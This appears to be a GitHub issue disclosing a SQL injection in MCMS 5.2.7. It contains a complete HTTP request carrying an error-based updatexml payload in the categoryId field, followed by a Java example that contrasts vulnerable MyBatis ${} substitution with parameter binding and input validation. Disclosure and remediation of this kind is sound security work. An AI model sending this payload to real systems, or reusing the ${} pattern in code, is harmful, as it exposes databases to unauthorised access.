ming-soft/MCMS

MCMS 5.2.7 SQLI

Closed this issue · 1 comments

A suspicious point was found in the IContentDao.xml file

src/main/java/net/mingsoft/cms/dao/IContentDao.xml#221


Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in src/main/java/net/mingsoft/cms/action/CategoryAction.java and found a call to

net.mingsoft.base.biz.IBaseBiz#query


From this we can tell that the suspicious injection point is categoryId, and then try to inject:

```http
POST /cms/content/list HTTP/1.1
Host:127.0.0.1:8000
Connection: close
Accept: application/json, text/plain, */*
Origin: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Referer: http://172.20.10.3:8081/ms/main.do?
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

categoryId=1' and updatexml(1,concat(0x7e,database(),0x7e),1) and 'zzz'='zzz
```

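The following is an added example, not code from MCMS or from this issue, illustrating the MyBatis pattern that produces this class of bug and the two-layer fix a maintainer would apply. Because the screenshot of IContentDao.xml line 221 is not reproduced above, the exact mapping is an assumption: the example assumes the value reached the SQL text through `${}` string substitution. The mapper name `ContentListMapper`, the table `cms_content`, the column `category_id`, and the `CategoryIdValidator` helper are all hypothetical names chosen for the example.

```java
import org.apache.ibatis.annotations.Param;
import org.apache.ibatis.annotations.Select;

import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Hypothetical MyBatis mapper (annotation form, equivalent to an XML <select>).
 * Table and column names are assumptions for the example, not MCMS's schema.
 */
public interface ContentListMapper {

    // Assumed vulnerable pattern: ${} pastes the raw request value into the SQL
    // text before it is sent to the database, so a categoryId such as
    //   1' and updatexml(1,concat(0x7e,database(),0x7e),1) and 'zzz'='zzz
    // becomes part of the statement itself. Shown only for contrast.
    @Select("select * from cms_content where category_id = '${categoryId}'")
    List<Map<String, Object>> listUnsafe(@Param("categoryId") String categoryId);

    // Hardened form: #{} binds a JDBC parameter. The value travels separately
    // from the SQL text and can never change the statement's structure,
    // whatever characters it contains. Typing the parameter as long adds a
    // second guarantee: only a number can reach the database at all.
    @Select("select * from cms_content where category_id = #{categoryId}")
    List<Map<String, Object>> listSafe(@Param("categoryId") long categoryId);
}

/**
 * Hypothetical request-side check, applied in the action layer before the
 * value is handed to the DAO. An identifier field should only ever be digits,
 * so anything else is rejected rather than passed through.
 */
final class CategoryIdValidator {

    // One to eighteen digits: fits in a long and excludes quotes, spaces,
    // parentheses and every other character an injection payload needs.
    private static final Pattern DIGITS = Pattern.compile("\\d{1,18}");

    private CategoryIdValidator() {
    }

    /** Returns the parsed id, or throws for anything that is not a plain integer. */
    static long parse(String raw) {
        if (raw == null || !DIGITS.matcher(raw).matches()) {
            throw new IllegalArgumentException("categoryId must be a positive integer");
        }
        return Long.parseLong(raw);
    }

    public static void main(String[] args) {
        // Legitimate value from a normal list request (constructed input).
        System.out.println("accepted: " + parse("1"));

        // The payload from the report above is refused before any SQL is built.
        String payload = "1' and updatexml(1,concat(0x7e,database(),0x7e),1) and 'zzz'='zzz";
        try {
            parse(payload);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The parameter binding is the fix that actually closes the hole; the validator is defence in depth and also gives a clean place to log rejected values, which is a useful detection signal for requests like the one shown in the report.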

5.2.9 fixes it.